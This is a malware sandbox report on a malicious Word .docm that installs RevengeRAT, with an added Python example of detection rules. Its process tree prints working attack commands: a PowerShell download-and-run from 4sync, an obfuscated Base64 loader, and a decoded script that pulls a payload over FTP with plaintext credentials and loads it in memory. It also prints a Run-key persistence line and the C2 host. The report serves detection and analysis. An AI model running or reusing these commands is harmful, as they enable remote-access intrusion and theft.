Analysis
max time kernel: 148s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23/09/2024, 17:38
Static task: static1
Behavioral task: behavioral1
  Sample: 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
  Resource: win7-20240903-en
Behavioral task: behavioral2 (the run reported below; it matches the platform and resource above)
  Sample: 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
  Resource: win10v2004-20240802-en
General
Target: 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Size: 124KB
MD5: cc0f9cc1f9133b0f5dd045a34b2d7ae1
SHA1: c41f1c79442c0e2b717473f9c40d395176afffdb
SHA256: 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696
SHA512: 154c2ddc43ba72e1f166dc025e20ef5c580e1f490f1828496c1f10f8ef17b4432137740c66552d12cb647499e9ad7d5a62e5ab709ed2bcd9d08d2416b475c3da
SSDEEP: 1536:vkc9anle9tQVTGH7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBXFtc:vVWqQVtClwH9r0l77AnsSmy/BVtqxp
Malware Config
Extracted
  URL prefix: https://drive.google.com/uc?export=download&id= (the file id is appended by the stage-4 script according to processor architecture; see the process tree)
Extracted
  Protocol: ftp
  Host: ftp.desckvbrat.com.br
  Port: 21
  Username: desckvbrat1
  Password: developerpro21578Jp@@
Extracted
  Family: revengerat
  NyanCatRevenge
  C2: marcelotatuape.ddns.net:333
  b25e533944db469
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3640 | 1624 | powershell.exe | 81

RevengeRAT
Remote-access trojan with a wide range of capabilities.

Blocklisted process makes network request (9 IoCs)
flow | pid | Process
55 | 3640 | powershell.exe
57 | 3640 | powershell.exe
61 | 4320 | powershell.exe
63 | 4320 | powershell.exe
65 | 4320 | powershell.exe
68 | 4320 | powershell.exe
70 | 4320 | powershell.exe
71 | 4320 | powershell.exe
74 | 568 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | WScript.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_r = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\lngbo.ps1' \";exit" | powershell.exe
Command and Scripting Interpreter: PowerShell (4 IoCs)
(The heading of this table was lost in extraction; the four PIDs are the ones the process tree tags with this signature.)
pid | Process
64 | powershell.exe
4320 | powershell.exe
3592 | powershell.exe
568 | powershell.exe
Indicator Removal: File Deletion (1 TTP)
Adversaries may delete files left behind by the actions of their intrusion activity.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
flow | ioc
73 | pastebin.com
74 | pastebin.com

Drops file in System32 directory (1 IoC)
description | ioc | Process
File opened for modification | C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
The literal, unexpanded %AppData% in this path is most likely a cmd-style variable that PowerShell does not expand, so the relative path resolved against the process's working directory (C:\Windows\System32); the intended target appears to be the user's Start Menu PowerShell shortcut, not a file in System32.

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 568 set thread context of 1996 | 568 | powershell.exe | 106

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE

Modifies registry class (1 IoC)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings | explorer.exe

Suspicious behavior: AddClipboardFormatListener (2 IoCs)
pid | Process
1624 | WINWORD.EXE (x2)

Suspicious behavior: EnumeratesProcesses (12 IoCs)
pid | Process
3640 | powershell.exe (x2)
64 | powershell.exe (x2)
4320 | powershell.exe (x3)
3592 | powershell.exe (x2)
568 | powershell.exe (x3)

Suspicious use of AdjustPrivilegeToken (5 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3640 | powershell.exe
Token: SeDebugPrivilege | 64 | powershell.exe
Token: SeDebugPrivilege | 4320 | powershell.exe
Token: SeDebugPrivilege | 3592 | powershell.exe
Token: SeDebugPrivilege | 568 | powershell.exe

Suspicious use of SetWindowsHookEx (7 IoCs)
pid | Process
1624 | WINWORD.EXE (x7)

Suspicious use of WriteProcessMemory (24 IoCs)
description | pid | Process | procid_target
PID 1624 wrote to memory of 3640 | 1624 | WINWORD.EXE | 94 (x2)
PID 3640 wrote to memory of 1964 | 3640 | powershell.exe | 97 (x2)
PID 4316 wrote to memory of 2076 | 4316 | explorer.exe | 99 (x2)
PID 2076 wrote to memory of 64 | 2076 | WScript.exe | 100 (x2)
PID 64 wrote to memory of 4320 | 64 | powershell.exe | 102 (x2)
PID 4320 wrote to memory of 3592 | 4320 | powershell.exe | 103 (x2)
PID 4320 wrote to memory of 568 | 4320 | powershell.exe | 104 (x2)
PID 4320 wrote to memory of 3684 | 4320 | powershell.exe | 105 (x2)
PID 568 wrote to memory of 1996 | 568 | powershell.exe | 106 (x8)
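The signatures above are tria.ge's; what a defender takes from them is a handful of reusable observables: an Office process starting a script host, WScript.exe running a .js out of the user's Temp folder, powershell.exe started with -ExecutionPolicy Bypass or a hidden window, a .NET utility (RegAsm.exe) started by PowerShell with no arguments, and a Run key whose value launches PowerShell that way. The Python below is an added example, not tria.ge's code and not derived from the sample's own code: it turns those observables into rules and runs them over constructed Sysmon-style events that mirror this report (the field names ParentImage, Image, CommandLine, TargetObject and Details are an assumption about the telemetry source). One caveat it handles: PowerShell accepts any unambiguous prefix of a parameter name, so the Run key's `-Comman` is a working `-Command`; a rule that matches only the full switch name misses it.

```python
import re

# Added example: detection rules derived from this report's signatures, run over
# constructed Sysmon-style events.  Field names (ParentImage, Image, CommandLine,
# TargetObject, Details) are an assumption about the telemetry source.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "mshta.exe"}
# .NET utilities that are often started with no arguments purely to host injected code
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}


def image_name(path):
    """Lower-cased file name of an image path; quotes and either slash style tolerated."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_ps_switch(cmdline, name, min_prefix, aliases=()):
    """True if cmdline carries the powershell.exe switch `name` in any form PowerShell
    accepts: the full name, any prefix of at least `min_prefix` characters (this is
    why the report's "-Comman" works as -Command), or a documented alias."""
    forms = [name[:i] for i in range(len(name), min_prefix - 1, -1)] + list(aliases)
    pattern = r"(?<!\S)-(?:" + "|".join(map(re.escape, forms)) + r")(?=\s|$|:)"
    return re.search(pattern, cmdline, re.IGNORECASE) is not None


def detect_process(ev):
    """Rule names that fire for one process-creation event."""
    parent, image, cmd = image_name(ev["ParentImage"]), image_name(ev["Image"]), ev["CommandLine"]
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")           # WINWORD.EXE -> powershell.exe (PID 3640)
    if image in {"wscript.exe", "cscript.exe"} and re.search(r"\\AppData\\Local\\Temp\\[^\"]+\.js\b", cmd, re.I):
        hits.append("script_host_runs_js_from_temp")      # WScript.exe test.js (PID 2076)
    if image in {"powershell.exe", "pwsh.exe"}:
        if has_ps_switch(cmd, "ExecutionPolicy", 2, aliases=("ep",)) and re.search(r"\bbypass\b", cmd, re.I):
            hits.append("powershell_executionpolicy_bypass")   # x2.ps1 / lngbo.ps1 launches
        if has_ps_switch(cmd, "WindowStyle", 3, aliases=("w",)) and re.search(r"\bhidden\b", cmd, re.I):
            hits.append("powershell_hidden_window")
    args = re.sub(r'^\s*(?:"[^"]*"|\S+)', "", cmd).strip()   # everything after the image token
    if parent in {"powershell.exe", "pwsh.exe"} and image in DOTNET_HOSTS and not args:
        hits.append("powershell_starts_dotnet_host_without_args")   # RegAsm.exe (PID 1996)
    return hits


def detect_registry(ev):
    """Rule names that fire for one registry value-set event."""
    hits = []
    if re.search(r"\\CurrentVersion\\Run\\", ev["TargetObject"], re.I):
        details = ev["Details"]
        if re.search(r"powershell(\.exe)?\b", details, re.I) and (
                has_ps_switch(details, "ExecutionPolicy", 2, aliases=("ep",))
                or has_ps_switch(details, "WindowStyle", 3, aliases=("w",))):
            hits.append("run_key_launches_policy_bypass_powershell")
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [  # constructed from the process tree in this report
    {"ParentImage": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE", "Image": PS,
     "CommandLine": f'"{PS}" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WScript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"'},
    {"ParentImage": PS, "Image": PS,
     "CommandLine": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\lngbo.ps1"'},
    {"ParentImage": PS, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign control: Word opened normally, must not fire
     "Image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\notes.docx"'},
]
SAMPLE_REGISTRY_EVENT = {  # constructed from the Run key IoC in this report
    "TargetObject": r"HKU\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_r",
    "Details": r'''cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\lngbo.ps1' ";exit''',
}


def run_all(process_events=SAMPLE_PROCESS_EVENTS, registry_event=SAMPLE_REGISTRY_EVENT):
    """Map rule name -> list of event indexes ("registry" for the Run key event)."""
    alerts = {}
    for i, ev in enumerate(process_events):
        for rule in detect_process(ev):
            alerts.setdefault(rule, []).append(i)
    for rule in detect_registry(registry_event):
        alerts.setdefault(rule, []).append("registry")
    return alerts


if __name__ == "__main__":
    for rule, where in run_all().items():
        print(f"{rule}: events {where}")
```

The lineage rule fires only on the first hop (Word to powershell.exe); the rest of the chain is started by explorer.exe and WScript.exe, which is why the other rules key on command-line content and on the Run key rather than on parentage.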
Processes

WINWORD.EXE (PID 1624)
  "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  powershell.exe (PID 3640, child of 1624)
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    explorer.exe (PID 1964, child of 3640)
      "C:\Windows\explorer.exe" test.js

explorer.exe (PID 4316)
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  WScript.exe (PID 2076, child of 4316)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    powershell.exe (PID 64, child of 2076)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAFIAeg㍿XAFcAcgAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAFIAeg㍿XAFcAcgAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿SAHoAVw㍿XAHIALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAFIAeg㍿XAFcAcgAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿TAHQAcg㍿pAG4AZwAoACAAJw㍿mAHQAcAA6AC8ALw㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0ADEAQA㍿mAHQAcAAuAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQALg㍿jAG8AbQAuAGIAcgAvAFUAcA㍿jAHIAeQ㍿wAHQAZQ㍿yAC8AMAAyAC8ARA㍿MAEwAMAAxAC4AdA㍿4AHQAJwAgACkAOwAkAFIAeg㍿XAFcAcgAuAGQAaQ㍿zAHAAbw㍿zAGUAKAApADsAJA㍿SAHoAVw㍿XAHIAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿SAHoAVw㍿XAHIALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAA7ACQAVg㍿0AGEAQQ㍿GACAAPQAgACQAUg㍿6AFcAVw㍿yAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAgACkAOw㍿bAEIAeQ㍿0AGUAWw㍿dAF0AIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQw㍿vAG4Adg㍿lAHIAdA㍿dADoAOg㍿GAHIAbw㍿tAEIAYQ㍿zAGUANgA0AFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAuAFIAZQ㍿wAGwAYQ㍿jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw㍿TAHkAcw㍿0AGUAbQAuAEEAcA㍿wAEQAbw㍿tAGEAaQ㍿uAF0AOgA6AEMAdQ㍿yAHIAZQ㍿uAHQARA㍿vAG0AYQ㍿pAG4ALg㍿MAG8AYQ㍿kACgAIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgACkALg㍿HAGUAdA㍿UAHkAcA㍿lACgAIAAnAEMAbA㍿hAHMAcw㍿MAGkAYg㍿yAGEAcg㍿5ADMALg㍿DAGwAYQ㍿zAHMAMQAnACAAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAIAAnAHAAcg㍿GAFYASQAnACAAKQAuAEkAbg㍿2AG8Aaw㍿lACgAJA㍿uAHUAbA㍿sACwAIA㍿bAG8AYg㍿qAGUAYw㍿0AFsAXQ㍿dACAAKAAgACcAMgAyACUAOQA2AGMAOAA1ADMANgA1ADYAYgAwADYAYQA1ADYAOA㍿kAGIAMg㍿jADIAMQ㍿hAGUANg㍿jAGIAYgAyADEANQ㍿iADIAMgAlAD0AdgAmAGQAYQ㍿vAGwAbg㍿3AG8AZAA9AGUAYw㍿yAHUAbw㍿zACYAdA㍿4AHQALg㍿0AHgAdAA3ADIAJQA3ADIAJQA4AC0ARg㍿UAFUARAAzACUAQQAyACUAZQ㍿tAGEAbg㍿lAGwAaQ㍿mACsAQgAzACUAMgAyACUAdA㍿4AHQALg㍿0AHgAdAAyADIAJQ㍿EADMAJQ㍿lAG0AYQ㍿uAGUAbA㍿pAGYAKw㍿CADMAJQ㍿0AG4AZQ㍿tAGgAYw㍿hAHQAdA㍿hAD0Abg㍿vAGkAdA㍿pAHMAbw㍿wAHMAaQ㍿kAC0AdA㍿uAGUAdA㍿uAG8AYwAtAGUAcw㍿uAG8AcA㍿zAGUAcgA/AHQAeA㍿0AC4AYwA4ADgANgA3ADAANQAwADAANAA1AGMALQAwAGMANw㍿hAC0AMgA4ADkANAAtAGIAMg㍿hADIALQA2ADMAOQAxAGUAZAAyAGQALw㍿nAHAARQ㍿XAEoAdQ㍿RAHgALw㍿zAG0AZQ㍿0AGkALw㍿tAG8AYwAuAHQAaA㍿nAGkAegAuAG4AZA㍿jAC4AMA㍿uAC4AMQ㍿yAHQALgA3AHAALwAvADoAcw㍿wAHQAdA㍿oACcAIAAsACAAJwAlAEQAQw㍿QAEoAVQAlACcALAAgACcAdA㍿yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $fLbjh
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      powershell.exe (PID 4320, child of 64; the decoded script from PID 64)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$RzWWr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $RzWWr.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/02/DLL01.txt' );$RzWWr.dispose();$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $RzWWr.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );};"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        powershell.exe (PID 3592, child of 4320)
          powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
          - Adds Run key to start application
          - Command and Scripting Interpreter: PowerShell
